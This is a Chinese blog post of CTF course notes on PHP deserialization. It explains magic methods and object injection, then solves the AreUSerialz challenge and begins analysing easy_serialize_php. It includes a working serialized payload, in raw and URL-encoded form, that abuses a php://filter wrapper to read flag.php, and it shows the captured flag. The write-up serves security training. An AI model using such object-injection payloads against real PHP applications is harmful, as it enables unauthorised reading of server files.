<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/file/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/file/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/file/favicon-16x16.png">
  <link rel="mask-icon" href="/file/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"czlz.net","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言第四天，PHP反序列化。">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP序列化与反序列化（大比武_CTF课_第四天）">
<meta property="og:url" content="https://czlz.net/2020/jxsw_dbw_web_4/index.html">
<meta property="og:site_name" content="粗制乱造的个人网站">
<meta property="og:description" content="前言第四天，PHP反序列化。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/AreUSerialz.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/easy_serialize_phppng.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/EzPHP_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/EzPHP_2.png">
<meta property="article:published_time" content="2020-07-01T16:00:00.000Z">
<meta property="article:modified_time" content="2020-07-03T18:23:49.247Z">
<meta property="article:author" content="粗制乱造">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="练习题">
<meta property="article:tag" content="CTF课">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="文件上传">
<meta property="article:tag" content="PHP反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czlz.net/2020/jxsw_dbw_web_4/AreUSerialz.png">

<link rel="canonical" href="https://czlz.net/2020/jxsw_dbw_web_4/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>PHP序列化与反序列化（大比武_CTF课_第四天） | 粗制乱造的个人网站</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">粗制乱造的个人网站</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">杂七杂八的一堆东西</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/pyodide/" rel="section"><i class="fa fa-user fa-fw"></i>在线Python3.8</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czlz.net/2020/jxsw_dbw_web_4/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/file/avatar.png">
      <meta itemprop="name" content="粗制乱造">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="粗制乱造的个人网站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PHP序列化与反序列化（大比武_CTF课_第四天）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-07-02 00:00:00" itemprop="dateCreated datePublished" datetime="2020-07-02T00:00:00+08:00">2020-07-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-07-04 02:23:49" itemprop="dateModified" datetime="2020-07-04T02:23:49+08:00">2020-07-04</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" itemprop="url" rel="index"><span itemprop="name">PHP反序列化</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <!-- toc -->
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第四天，PHP反序列化。</p>
<a id="more"></a>
<h1 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h1><h2 id="PHP的序列化与反序列化"><a href="#PHP的序列化与反序列化" class="headerlink" title="PHP的序列化与反序列化"></a>PHP的序列化与反序列化</h2><p>• 序列化是将变量转换为可保存或传输字符串的过程<br>• 反序列化就是在适当的时候把这个字符串再转化成之前的变量来使用<br>• php进行序列化的目的是保存一个对象方便以后重用<br>• php提供了serialize和unserialize函数用以进行序列化和反序列化的操作<br>• Serialize将变量转化为字符串并且在转换中保存当前变量的值<br>• Unserialize将serialize生成的字符串变换回变量</p>
<h2 id="PHP中的魔术方法"><a href="#PHP中的魔术方法" class="headerlink" title="PHP中的魔术方法"></a>PHP中的魔术方法</h2><p>1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括访问控制为proteced,private的属性（即没有权限访问的属性）<br>2、__isset、__unset __isset( $property ) 当在一个未定义的属性上调用isset()函数时调用此方法 __unset( $property ) 当在一个未定义的属性上调用unset()函数时调用此方法 与__get方法和__set方法相同，这里的没有声明包括访问控制为proteced,private的属性（即没有权限访 问的属性）<br>3、__call __call( $method, $arg_array ) 当调用一个未定义(包括没有权限访问)的方法是调用此方法<br>4、__autoload __autoload 函数，使用尚未被定义的类时自动调用。通过此函数，脚本引擎在 PHP 出错失败前有了最后 一个机会加载所需的类。 注意: 在 __autoload 函数中抛出的异常不能被 catch 语句块捕获并导致致命错误。<br>5、__construct、__destruct __construct 构造方法，当一个对象被创建时调用此方法，好处是可以使构造方法有一个独一无二的名 称，无论它所在的类的名称是什么，这样你在改变类的名称时，就不需要改变构造方法的名称 __destruct 析构方法，PHP将在对象被销毁前（即从内存中清除前）调用这个方法 默认情况下,PHP仅仅释放对象属性所占用的内存并销毁对象相关的资源.，析构函数允许你在使用一个对 象之后执行任意代码来清除内存，当PHP决定你的脚本不再与对象相关时，析构函数将被调用.，在一个 函数的命名空间内，这会发生在函数return的时候，对于全局变量，这发生于脚本结束的时候，如果你想 明确地销毁一个对象，你可以给指向该对象的变量分配任何其它值，通常将变量赋值勤为NULL或者调用 unset。<br>6、__clone PHP5中的对象赋值是使用的引用赋值，使用clone方法复制一个对象时，对象会自动调用__clone魔术方 法，如果在对象复制需要执行某些初始化操作，可以在__clone方法实现。<br>7、__toString __toString方法在将一个对象转化成字符串时自动调用，比如使用echo打印对象时，如果类没有实现此方 法，则无法通过echo打印对象，否则会显示：Catchable fatal error: Object of class test could not be converted to string in，此方法必须返回一个字符串。 在PHP 5.2.0之前，__toString方法只有结合使用echo() 或 print()时 才能生效。PHP 5.2.0之后，则可以 在任何字符串环境生效（例如通过printf()，使用%s修饰符），但 不能用于非字符串环境（如使用%d修 饰符）。从PHP 5.2.0，如果将一个未定义__toString方法的对象 转换为字符串，会报出一个 E_RECOVERABLE_ERROR错误。<br>8、__sleep、__wakeup __sleep 串行化的时候用 __wakeup 反串行化的时候调用 serialize() 检查类中是否有魔术名称 __sleep 的函数。如果这样，该函数将在任何序列化之前运行。它可 以清除对象并应该返回一个包含有该对象中应被序列化的所有变量名的数组。 使用 __sleep 的目的是关闭对象可能具有的任何数据库连接，提交等待中的数据或进行类似的清除任务。 此外，如果有非常大的对象而并不需要完全储存下来时此函数也很有用。 相反地，unserialize() 检查具有魔术名称 __wakeup 的函数的存在。如果存在，此函数可以重建对象可 能具有的任何资源。使用 __wakeup 的目的是重建在序列化中可能丢失的任何数据库连接以及处理其它 重新初始化的任务。<br>9、__set_state 当调用var_export()时，这个静态 方法会被调用（自PHP 5.1.0起有效）。本方法的唯一参数是一个数组 ，其中包含按array(’property’ =&gt; value, …)格式排列的类属性。<br>10、__invoke 当尝试以调用函数的方式调用一个对象时，__invoke 方法会被自动调用。PHP5.3.0以上版本有效。<br>11、__callStatic 它的工作方式类似于 __call() 魔术方法，__callStatic() 是为了处理静态方法调用，PHP5.3.0以上版本有效 ，PHP 确实加强了对 __callStatic() 方法的定义；它必须是公共的，并且必须被声明为静态的。同样， __call() 魔术方法必须被定义为公共的，所有其他魔术方法都必须如此。</p>
<h2 id="PHP反序列化漏洞原理"><a href="#PHP反序列化漏洞原理" class="headerlink" title="PHP反序列化漏洞原理"></a>PHP反序列化漏洞原理</h2><p>· php反序列化漏洞又称对象注入，可能会导致注入，远程代码执行等安全问题的发生。<br>· php反序列化漏洞如何产生:<br>如果一个php代码中使用了unserialize函数去调用某类, 该类中会自动执行一些自定义的magic method,这些magic method中如果包含了一些危险的操作，或者这些magic method会去调用类中其他带 有危险操作的函数，如果这些危险操作是我们可控的，那么就可以进行一些不可描述的操作了。</p>
<h2 id="序列化测试"><a href="#序列化测试" class="headerlink" title="序列化测试"></a>序列化测试</h2><p>当public、private、protected的成员变量在序列化以后有什么不同。</p>
<h1 id="做题"><a href="#做题" class="headerlink" title="做题"></a>做题</h1><h2 id="网鼎杯2020青龙组-AreUSerialz"><a href="#网鼎杯2020青龙组-AreUSerialz" class="headerlink" title="[网鼎杯2020青龙组]AreUSerialz"></a>[网鼎杯2020青龙组]AreUSerialz</h2><p>废话少说直接上代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> $op;</span><br><span class="line">    <span class="keyword">protected</span> $filename;</span><br><span class="line">    <span class="keyword">protected</span> $content;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $op = <span class="string">"1"</span>;</span><br><span class="line">        $filename = <span class="string">"/tmp/tmpfile"</span>;</span><br><span class="line">        $content = <span class="string">"Hello World!"</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">process</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">"1"</span>) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;write();</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">"2"</span>) &#123;</span><br><span class="line">            $res = <span class="keyword">$this</span>-&gt;read();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output($res);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output(<span class="string">"Bad Hacker!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">write</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;filename) &amp;&amp; <span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;content)) &#123;</span><br><span class="line">            <span class="keyword">if</span>(strlen((string)<span class="keyword">$this</span>-&gt;content) &gt; <span class="number">100</span>) &#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;output(<span class="string">"Too long!"</span>);</span><br><span class="line">                <span class="keyword">die</span>();</span><br><span class="line">            &#125;</span><br><span class="line">            $res = file_put_contents(<span class="keyword">$this</span>-&gt;filename, <span class="keyword">$this</span>-&gt;content);</span><br><span class="line">            <span class="keyword">if</span>($res) <span class="keyword">$this</span>-&gt;output(<span class="string">"Successful!"</span>);</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">$this</span>-&gt;output(<span class="string">"Failed!"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output(<span class="string">"Failed!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">read</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $res = <span class="string">""</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;filename)) &#123;</span><br><span class="line">            $res = file_get_contents(<span class="keyword">$this</span>-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">output</span><span class="params">($s)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"[Result]: &lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> $s;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op === <span class="string">"2"</span>)</span><br><span class="line">            <span class="keyword">$this</span>-&gt;op = <span class="string">"1"</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;content = <span class="string">""</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_valid</span><span class="params">($s)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; strlen($s); $i++)</span><br><span class="line">        <span class="keyword">if</span>(!(ord($s[$i]) &gt;= <span class="number">32</span> &amp;&amp; ord($s[$i]) &lt;= <span class="number">125</span>))</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET&#123;<span class="string">'str'</span>&#125;)) &#123;</span><br><span class="line"></span><br><span class="line">    $str = (string)$_GET[<span class="string">'str'</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_valid($str)) &#123;</span><br><span class="line">        $obj = unserialize($str);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>代码审计:<br>第一、要绕过的的是is_valid。这个很好理解，ord是取字符的ASCII码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">int ord ( string $string )</span><br><span class="line">返回字符串 string 第一个字符的 ASCII 码值。</span><br></pre></td></tr></table></figure>
<p>所以这个函数就是要验证是否为可见字符。</p>
<p>第二、__construct构造函数看起来是最先执行的，而__destruct析构函数是最后执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $op = <span class="string">"1"</span>;</span><br><span class="line">        $filename = <span class="string">"/tmp/tmpfile"</span>;</span><br><span class="line">        $content = <span class="string">"Hello World!"</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是代码中$op,$filename,$content均未加this -&gt;。也就是说他根本没改变类中对应属性的值。</p>
<p>第三、在process函数与__destruct函数中的$this-&gt;op的比较使用了不同的方法process使用了==，而_destruct中使用了===。由于==存在类型转换的原因，存在比较漏洞。因为如果有数字的存在，那行==比较时会把两边都转为数字。（感谢同事的提点）</p>
<p>第四、protected在序列化的时候会出现%00，这太讨厌了,这属于不可见字符。会被过滤掉。要想办法解决掉。不知道如果把protected改成public能不能行。</p>
<p>尝试构造：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="comment">//为了过判断，使用了数值型。</span></span><br><span class="line">    <span class="keyword">public</span> $op =<span class="number">2</span> ;</span><br><span class="line">    <span class="comment">//通过伪协议获取flag.php的源码。</span></span><br><span class="line">    <span class="keyword">public</span> $filename = <span class="string">"php://filter/read=convert.base64-encode/resource=flag.php"</span>;</span><br><span class="line">    <span class="keyword">public</span> $content;</span><br><span class="line">&#125;</span><br><span class="line">$a=<span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="keyword">echo</span> serialize($a);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n&lt;br /&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>生成得到playload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O:11:"FileHandler":3:&#123;s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;&#125;</span><br><span class="line"></span><br><span class="line">O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3Bs%3A7%3A%22content%22%3BN%3B%7D</span><br></pre></td></tr></table></figure>
<p>由于没有%00的存在，提交哪个好像都可以。<br><img src="AreUSerialz.png" alt="得到flag"><br>再解码BASE64得到flag<br>flag{786817fe-f122-4c41-8d34-1252c2dd49b7}</p>
<h2 id="安洵杯2019-easy-serialize-php"><a href="#安洵杯2019-easy-serialize-php" class="headerlink" title="[安洵杯2019]easy_serialize_php"></a>[安洵杯2019]easy_serialize_php</h2><p>先上代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$function = @$_GET[<span class="string">'f'</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span><span class="params">($img)</span></span>&#123;</span><br><span class="line">    $filter_arr = <span class="keyword">array</span>(<span class="string">'php'</span>,<span class="string">'flag'</span>,<span class="string">'php5'</span>,<span class="string">'php4'</span>,<span class="string">'fl1g'</span>);</span><br><span class="line">    $filter = <span class="string">'/'</span>.implode(<span class="string">'|'</span>,$filter_arr).<span class="string">'/i'</span>;</span><br><span class="line">    <span class="keyword">return</span> preg_replace($filter,<span class="string">''</span>,$img);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_SESSION)&#123;</span><br><span class="line">    <span class="keyword">unset</span>($_SESSION);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_SESSION[<span class="string">"user"</span>] = <span class="string">'guest'</span>;</span><br><span class="line">$_SESSION[<span class="string">'function'</span>] = $function;</span><br><span class="line"></span><br><span class="line">extract($_POST);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!$function)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;a href="index.php?f=highlight_file"&gt;source_code&lt;/a&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'img_path'</span>])&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = base64_encode(<span class="string">'guest_img.png'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = sha1(base64_encode($_GET[<span class="string">'img_path'</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$serialize_info = filter(serialize($_SESSION));</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($function == <span class="string">'highlight_file'</span>)&#123;</span><br><span class="line">    highlight_file(<span class="string">'index.php'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>($function == <span class="string">'phpinfo'</span>)&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">'phpinfo();'</span>); <span class="comment">//maybe you can find something in here!</span></span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>($function == <span class="string">'show_image'</span>)&#123;</span><br><span class="line">    $userinfo = unserialize($serialize_info);</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(base64_decode($userinfo[<span class="string">'img'</span>]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>一、大概分析了一个代码，extract($_POST);感觉出现的好诡异。<br>查了一下手册<br>解释为extract — 从数组中将变量导入到当前的符号表<br>按照我自己的理解为，通过POST提交的数据都会直接转换成，当前的变量名=变量值。<br>这里序列化的就是$_SESSION。那么我就考虑$_SESSION[“hehe”]=变量值来提交。</p>
<p>二、关键函数<br>$userinfo = unserialize($serialize_info);<br>echo file_get_contents(base64_decode($userinfo[‘img’]));<br>反序列化$_SESSION[‘img’]的值，并将这个base64解密值解密，获取一个文件路径内容，并显示到当前页面上。</p>
<p>三、在网上找了一下资料关于PHP序列化的。<br>发现了一个叫做序列化的逃逸的东西。不知道怎么解释。直接试着操作一下吧。</p>
